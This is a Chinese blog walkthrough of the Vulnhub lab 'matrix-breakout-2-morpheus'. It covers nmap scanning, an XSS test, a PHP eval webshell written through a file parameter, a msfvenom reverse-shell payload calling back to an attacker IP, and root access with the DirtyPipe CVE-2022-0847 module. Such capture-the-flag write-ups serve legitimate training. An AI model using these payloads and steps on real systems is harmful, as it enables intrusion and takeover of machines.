[Vulnhub] matrix-breakout-2-morpheus

目录

<1> 信息收集

<2> getshell

 <3> Privilege Escalation(提权)


<1> 信息收集

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.154

nmap -A -p 1-65535 192.168.236.154 扫描一下靶机开放哪些服务

开放了22端口的ssh服务和 80、81的http服务

 访问一下 80 端口,提示 ssh用户都锁了,应该是无法利用   81端口是个登录服务

 扫一下目录 扫出来了 graffiti.txt和 graffiti.php  

graffiti.php存在一个输入框

输入 aaaa 发现他会显示在前端界面

输入 <script>alert('xss')</script> 试着xss 成功弹框 存在存储型xss漏洞

直接传入  <script language='php'>eval($_POST['a'])</script> 并无效果

但是我们再次访问 graffiti.txt时发现 我们在graffiti.php post的message参数都写入了其中

抓一下post包

  发现存在file参数,我们更改file为 test.php 

写入一句话木马,成功写入

<2> getshell

 写入成功后 蚁剑连接

/home下发现了cypher、trinity 两个用户

根目录下发现了 flag但是没有权限

尝试 suid提权,没有可利用的

find / -perm -u=s -type f 2>/dev/null 

 <3> Privilege Escalation(提权)

利用msf的提权辅助模块来提权

使用 msf监听模块 exploit/multi/handler 开个监听

 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 -f elf > shell.elf

利用msfvenom 生成木马文件 上传到靶机上的 /tmp目录下

msf开启监听之后,运行 ./shell.elf

得到会话

 background 回到 msf  

search 找本地提权的辅助模块

 options 设置所需的参数,设置好之后 run

找到了  exploit/linux/local/cve_2022_0847_dirtypipe

执行linpeas.sh也可以 查询

 或者本地上传对应 ./linux-exploit-suggester.sh

这里利用 CVE-2022-0847

设置好对应参数  run 

 

 成功返回了 会话2  可见 提权成功

 cd /root目录下 cat FLAG.txt 得到flag

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值